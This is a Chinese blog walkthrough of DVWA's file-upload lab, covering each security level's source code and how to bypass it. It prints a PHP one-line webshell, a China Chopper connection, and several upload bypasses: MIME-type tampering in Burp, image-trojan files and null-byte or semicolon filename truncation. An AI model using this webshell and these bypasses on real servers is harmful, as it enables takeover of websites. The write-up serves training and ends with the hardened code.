DVWA-文件上传

最新推荐文章于 2025-06-25 09:51:40 发布
转载 最新推荐文章于 2025-06-25 09:51:40 发布 · 6.2k 阅读 · 18

本文深入探讨文件上传漏洞的原理及利用方法,从低至高安全级别详细解析如何绕过限制,上传恶意文件至服务器,包括利用Apache解析漏洞、绕过WAF及上传木马等技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

概述

文件上传漏洞是指服务器对于用户上传的部分控制不严格导致攻击者可上传一个恶意的可执行文件至服务器,简单点就是用户直接或通过各种绕过方式将webshell上传至服务器进而执行利用

攻击原理:

1.web容器的解析漏洞
2.配合解析漏洞进行waf绕过和上传木马。
Apache的文件解析漏洞,比如现在我们有一个1.php.rar.xx.kk的文件,那么服务器会报错吗?答案是否定的,Apache有自己的一套文件处理方式,
它会从后往前进行文件解析,到遇见认识的后缀为止,最终会解析成1.php。那么,它都认识什么呢?这个在Apaceh的安装目录/conf/mime.types文件中有详细介绍。

文件上传漏洞的利用是有限制条件的,首先当然是要能够成功上传木马文件,其次上传文件必须能够被执行,最后就是上传文件的路径必须可知。

<?php @eval($_POST['pass']);?>

【基本原理】
利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST[‘pass’]表示从页面中获得pass这个参数值。

接下来进入DVWA平台:http://127.0.0.1:8088/DVWA/index.php ,准备开始实验。
在这里插入图片描述
安全级别下,查看后台源码:

 <?php
 if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
  }
?>

从源码中发现,low级别未对上传的文件进行任何验证。所以可以直接上传PHP
一句话木马。
(1)我们将准备好的一句话木马直接上传,然后就可以看到回显的路径:
在这里插入图片描述
在这里插入图片描述
可以用菜刀连接了,菜刀界面右键,然后点击添加。然后填写相关的数据,如下图:
在这里插入图片描述
“中国菜刀”页面操作说明:

1、是连接的URL,就是网站的主路径然后加上上传文件时回显的保存路径;
2、是菜刀连接时的密码,就是上面图片一句话提交的数据(本例为"pass");
3、是一句话的解析类型,可以是asp,php,aspx。不同的解析类型的一句话内容不一样,文件后缀名不一样。

(3)然后可以看连接成功的界面:
在这里插入图片描述
(4)接着双击或者右键“文件管理”,进入以下界面:
在这里插入图片描述
Medium 安全级别

<?php
  if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
 }
?>

从源码中可以看出,该安全级别下的系统,上传文件时,对文件进行了后缀名验证,在if语句中判断上传文件的类型是否为“image/jpeg”和大小是否小于100kb。
在这里插入图片描述
破解思路为先将一句话木马改名为符合要求的格式,然后使用Burp Suite 进行抓包,修改上传的文件类型。客户端的验证不能依靠!!!我们使用BurpSuite绕过了客户端前端的文件格式验证。所以为了预防文件上传漏洞,需要在服务器进行文件格式的验证。

在这里插入图片描述
接下来咱们开始上传Hack.PNG文件,并使用BurpSuite抓包并修改文件后缀:
在这里插入图片描述
在这里插入图片描述
可以发现,已经将非法文件Hack.php成功上传!!!

或者将其中的类型改掉,之后提交。
打开 burpsuite 抓包,我们会在请求正文中看到这样的东西:

------WebKitFormBoundaryh4zhLV52OKhf6aJg
Content-Disposition: form-data; name="uploaded"; filename="a.php"
Content-Type: application/octet-stream

<?php

phpinfo();
------WebKitFormBoundaryh4zhLV52OKhf6aJg--

右键"send to repeater",然后把那个application/octet-stream改成image/jpeg。点击"go"发送

High 安全等级
 <?php
 if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
 }
?>

可以看到,High级别的代码读取文件名中最后一个”.”后的字符串,期望通过文件名来限制文件类型,因此要求上传文件名形式必须是“.jpg”、“.jpeg” 、“.png”之一。同时,getimagesize()函数更是限制了上传文件的文件头必须为图像类型。
我们需要将上传文件的文件头伪装成图片,首先利用copy命令将一句话木马文件Hack.php与正常的图片文件alone.jpg合并:
在这里插入图片描述

【备注】以下为CMD下用copy命令制作“图片木马”的步骤,其中,alone.jpg/b中“b”表示“二进制文件”,Hack.php/a中“a"表示ASCII码文件。

在这里插入图片描述
生成带有木马的图片文件hack.jpg:
在这里插入图片描述
接着我们打开生成的图片木马文件,我们可以看到一句话木马已附在图片文件末尾:
在这里插入图片描述
然后我们试着将生成的木马图片文件hack.jpg上传,上传成功!!!
在这里插入图片描述
法二、观察相同的位置,这回改成了使用后缀名判断。我们这个时候可以在后缀之前插入\0,即a.php\0.jpg,要注意它不是一个斜杠加上一个零,而是空字符。这样判断的时候,后缀是.jpg,写到磁盘的时候就会截断为a.php。既可以上传也可以执行
我们同样抓包并送到repeter。先把a.php改成a.php.jpg,然后切换到 hex 编辑模式来插入空字符。
在这里插入图片描述
鼠标拖动的范围就是a.php.jpg,在第二个2e格子上右键,点击"insert byte",会自动插入一个\0。之后点击"go"就大功告成了。

截断的核心,就是chr(0)这个字符 ,截断主要用于文件上传,不管什么样的截断其本质都是一样的,就是为了让程序忽略截断符后面的内容,只取截断符前面的内容。截断符有0x00,%00,’\0’。
在 IIS 和 Windows 环境下,截断字符 “;” 与 0x00 类似。可构造 aaa.asp;bbb.jpg。IIS 6 将执行aaa.asp。

法三、可以看到高等级代码对文件扩展名进行了过滤截取,并进行了扩展名的判断和大小的限制。但是这里做的判断依然不安全,通过修改上传的文件扩展名,我们可以轻松绕过限制。例如: 1.php 修改为 1.php.jpg 这样我们依然能上传PHP 格式的文件!

Impossible 安全级别
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );


    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) &&
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
            $img = imagecreatefromjpeg( $uploaded_tmp );
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp );
            imagepng( $img, $temp_file, 9);
        }
        imagedestroy( $img );

        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
            // Yes!
            echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
        }
        else {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }

        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

可以看到,Impossible级别的代码对上传文件 进行了重命名(为md5值,导致%00截断无法绕过过滤规则),加入Anti-CSRF token防护CSRF攻击,同时对文件的内容作了严格的检查,导致攻击者无法上传含有恶意脚本的文件。

参考博客:
https://blog.youkuaiyun.com/weixin_39190897/article/details/86771918
https://segmentfault.com/a/1190000006781093
https://blog.youkuaiyun.com/weixin_39190897/article/details/86772765

DVWA文件上传
qq_62078839的博客
04-03 3815
LOW 直接上传小马,上传成功 使用phpinfo();验证小马的可用性 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'na..
DVWA-文件上传漏洞代码审计(Medium、High)
oyqsb的博客
06-12 656
需要利用文件包含漏洞来执行php脚本,将上传的图片位置贴到文件包含漏洞利用处,访问后会返回一堆乱码即成功。若服务端脚本语言未对上传文件进行严格的过滤,会导致用户上传木马、病毒或恶意脚本,从而获得服务端的控制权限。:返回一个字符串在另一个字符串最后一次出现的位数(注意字符串是从0开始而不是1)将一张普通图片和php脚本copy出一个包含木马的图片。打开蚁剑添加url和密码。:通过指定长度来截取字符串,通过和上一个函数的配合截取出后缀名。:将上传文件移动到新位置,这里表示移动到指定目录
DVWA-File Upload(文件上传)
简简的博客
02-02 577
本系列文集:DVWA学习笔记 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 ###Low: 函数介绍: basename()函数返回路径中的文件名部分。 string basename ( string $path [, string $suffix ] ) 参数介...
渗透入门必备-DVWA靶场搭建教程(极其详细)
最新发布
bdfcfff77fa的博客
06-25 1081
将。
DVWA 之 File Upload(文件上传
RexHa的博客
10-02 2946
文件上传原理: 黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA篇_文件上传
05-25 2368
记一次DVWA文件上传漏洞复现
DVWA--文件上传(初中高)
firecjh的博客
06-10 2868
page=file:///C:\phpstudy_pro\WWW\DVWA-master\hackable\uploads\2.png,并验证文件包含漏洞是否利用成功。用bp抓包,在将文件扩展名改成.php,因为后端没有验证,这样就可以成功上传扩展名为.php的木马。进入DVWA平台,选择DVWA Security,将安全级别设置为High。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。一句话木马的话,把木马写入了目标机,直接连接的时候就不用设置。
DVWA-master.zip
09-16
8. 文件上传漏洞:如果上传功能没有严格限制,攻击者可能上传恶意文件并执行,如PHP后门。 9. 功能滥用:某些功能可能被设计得过于强大,没有适当的权限控制,攻击者可以利用这些功能进行非法操作。 为了更好地...
DVWA-master 靶场环境
02-22
它模拟了一个典型的Web应用程序,其中包含了大量的常见安全漏洞,例如SQL注入、跨站脚本(XSS)、文件上传漏洞等。这些漏洞是故意设计的,目的是为了给学习者提供一个实际操作的机会,让他们在安全的环境下学习如何...
DVWA-master.rar
03-15
安装PHPStudy后,将DVWA-master目录中的所有文件上传至PHPStudy的Web根目录。 3. **数据库配置**: 在DVWA源代码中,找到`config.inc.php`文件,配置你的MySQL数据库连接信息,包括数据库名、用户名、密码和主机地址...
web渗透测试实战-DVWA-文件上传漏洞(High-高级),菜刀工具-蚁剑
qq_39174983的博客
12-30 7252
本文将描述小白本白在进行DVWA-文件上传漏洞(高级)实战时的完成步骤,以及所遇到的问题
DVWA(文件上传)
weixin_44023403的博客
12-06 491
DVWA文件上传文件上传(File Upload)LowMedium 文件上传(File Upload) 文件上传介绍: 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 文件上传漏洞的利用的条件: 1.能够成功上传木马文件; 2.上传文件必须能够被执行; 3.上传文件的路径必须可知. Low 源码: <?php if( isset( $_POST[ 'Upload'
DVWA文件上传(File Upload)
qq_39682037的博客
03-21 2726
文件上传(File Upload) Security Level: low 源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; ...
DVWA-文件上传(File Upload)
weixin_58954236的博客
08-20 1700
指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
DVWA---文件上传
孤的博客
11-20 1012
File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 网页能够上传文件的条件 表单提交方式:post (get方式提交有大小限制,post没有) 表单的enctype属性:必须设置为multipart/form-data 表单必须有文件上传项:fi...
DVWA——文件上传
m0_74426634的博客
04-07 1190
大部分的网站和应用系统都有上传功能,一些文件上传功能实现代码没有严格限制用户上传文件后缀以及文件类型,导致允许攻击者向某个可通过Web访问的目录上传任意PHP文件,并能够将这些文件传递给PHP解释器,就可以在远程服务器上执行任意PHP脚本。当系统存在文件上传漏洞时攻击者可以将病毒、木马、WebShell、其他恶意脚本或者是包含了脚本的图片上传到服务器,这些文件将对攻击者后续攻击提供便利。根据具体漏洞的差异,此处上传的脚本可以是正常后缀的PHP、ASP以及JSP脚本,也可以是篡改后缀后的这几类脚本。
DVWA】——File Upload(文件上传
HinsCoder的博客
09-15 1441
文件上传漏洞是由于对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。
DVWA -File Upload fi
03-24
</think>### DVWA文件上传漏洞安全测试与利用方法 --- #### 一、漏洞原理 DVWA文件上传功能存在未严格验证文件类型、内容及路径的风险,攻击者可上传Web Shell(如PHP恶意文件)实现远程代码执行[^1]。漏洞等级...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值